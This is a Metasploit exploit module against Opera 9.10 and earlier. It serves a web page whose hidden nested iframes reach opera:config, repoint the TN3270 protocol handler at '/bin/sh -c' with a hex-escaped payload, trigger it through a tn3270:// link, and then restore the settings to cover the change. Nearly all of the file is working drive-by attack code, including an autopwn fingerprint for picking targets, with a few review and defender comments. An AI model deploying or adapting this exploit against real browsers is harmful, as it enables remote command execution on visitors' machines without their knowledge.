##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  include Msf::Exploit::Remote::BrowserAutopwn
  # Browser Autopwn fingerprint: the module is only served to Opera up to
  # and including 9.10 on Windows or Linux, and the client must have
  # JavaScript enabled because the whole exploit is client-side script.
  # No :vuln_test is given, so the version match alone decides selection.
  autopwn_info({
    :ua_name => HttpClients::OPERA,
    :ua_maxver => "9.10",
    :os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],
    :javascript => true,
    :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself
    :vuln_test => nil,
  })

  # Module metadata. Only the Unix ARCH_CMD target is active; the Windows
  # target is left commented out, so 'Platform' is restricted to unix even
  # though the autopwn fingerprint above also matches Windows clients.
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Opera 9 Configuration Overwrite',
          'Description' => %q{
            Opera web browser in versions <= 9.10 allows unrestricted script
            access to its configuration page, opera:config, allowing an
            attacker to change settings and potentially execute arbitrary
            code.
          },
          'License' => BSD_LICENSE,
          'Author' => [
            'egypt', # stolen from mpack
          ],
          'References' => [
            [ 'OSVDB', '66472'],
          ],
          'Payload' => {
            'EXITFUNC' => 'process',
            'Space' => 2048,
            'DisableNops' => true,
            # NOTE(review): the payload is hex-escaped before it is placed in
            # the page (see generate_evil_js), so excluding the space presumably
            # concerns how Opera splits the 'TN3270 App' preference into a
            # program and its arguments once decoded — confirm.
            'BadChars' => " ",
          },
          'Platform' => %w{unix},
          'Targets' => [
            # [ 'Opera < 9.10 Windows',
            # {
            # 'Platform' => 'win',
            # 'Arch' => ARCH_X86,
            # }
            # ],
            [
              'Opera < 9.10 Unix Cmd',
              {
                'Platform' => 'unix',
                'Arch' => ARCH_CMD,
              }
            ],
          ],
          # Not sure when this was disclosed but it's been known since at
          # least March 5, 2007, since that's the release date on the version
          # of mpack I stole this from.
          'DisclosureDate' => '2007-03-05',
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
  end

  # HTTP request handler. A request for this module's resource URI is
  # answered with an HTML page whose only content is the script built by
  # generate_evil_js; any other URI gets a 404 and the handler returns early.
  #
  # cli     - the connected client the response is written to
  # request - the parsed HTTP request; only request.uri is consulted
  def on_request_uri(cli, request)
    print_status("Got request #{request.uri}")

    case request.uri
    when get_resource
      print_status("Sending #{self.name}")
      content = "<body><script>"
      # NOTE(review): when no encoded payload can be regenerated,
      # generate_evil_js sends its own 404 and returns nil (its `return` only
      # leaves that method), so String#<< raises TypeError here after a
      # response has already gone out. A guard before this append would
      # avoid the second response attempt.
      content << generate_evil_js(cli, request)
      content << "</script></body>"
      headers = { 'Content-Type' => 'text/html' }
    else
      print_status("404ing request for #{request.uri}")
      send_not_found(cli)
      return
    end
    send_response_html(cli, content, headers)

    print_status("Done with request #{request.uri}")
  end

  # Builds the JavaScript served to the browser.
  #
  # The script works through nested iframes: a hidden about:blank iframe
  # evals code that loads opera:config in a second iframe and adds an
  # opera:cache iframe whose onload handler evals into the opera:config
  # window. That innermost script saves the current 'Network'/'TN3270 App'
  # and 'User Prefs'/'Run TN3270 In Terminal' preferences, points the TN3270
  # handler at '/bin/sh -c ' followed by the decoded payload, clicks a
  # tn3270:// link (random 5-9 letter host) so the handler is launched, and
  # restores both preferences via setTimeout one second later — this is the
  # "cleans up after itself" referred to in autopwn_info.
  #
  # The payload text is hex-escaped with '%' so it survives the several
  # quoting layers and is decoded in the browser with unescape().
  #
  # Returns the JavaScript as a String. If no encoded payload could be
  # regenerated for this client, a 404 is sent and nil is returned instead.
  #
  # Defender notes: the observable artefacts are a page embedding hidden
  # iframes to opera:config / opera:cache and a change to the TN3270 App
  # preference; per the module description only Opera <= 9.10 is affected.
  #
  # cli     - the connected client, used for payload regeneration and the 404
  # request - the HTTP request (currently unused in this method)
  def generate_evil_js(cli, request)
    # There are a bunch of levels of quotes here, so the easiest way to
    # make everything line up is to hex escape the command to run
    p = regenerate_payload(cli).encoded
    # NOTE(review): the `return` only fires if send_not_found returns a
    # truthy value, and it leaves this method with nil; `if not p` would
    # read more idiomatically as `unless p`.
    send_not_found(cli) && return if not p

    shellcode = Rex::Text.to_hex(p, "%")
    js = <<~ENDJS
      blank_iframe = document.createElement('iframe');
      blank_iframe.src = 'about:blank';
      blank_iframe.setAttribute('id', 'blank_iframe_window');
      blank_iframe.setAttribute('style', 'display:none');
      document.body.appendChild(blank_iframe);
      blank_iframe_window.eval(
      "config_iframe = document.createElement('iframe');" +
      "config_iframe.setAttribute('id', 'config_iframe_window');" +
      "config_iframe.src = 'opera:config';" +
      "document.body.appendChild(config_iframe);" +
      "cache_iframe = document.createElement('iframe');" +
      "cache_iframe.src = 'opera:cache';" +
      "cache_iframe.onload = function ()" +
      "{" +
      " config_iframe_window.eval" +
      " (\\"" +
      " old_handler = opera.getPreference('Network','TN3270 App');" +
      " old_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +
      " shellcode = '#{shellcode}';" +
      " opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
      " opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +
      " app_link = document.createElement('a');" +
      " app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5) + 5)}');" +
      " app_link.click();" +
      " setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
      " setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +
      " \\");" +
      "};" +
      "document.body.appendChild(cache_iframe);" +
      "");
    ENDJS
  end
end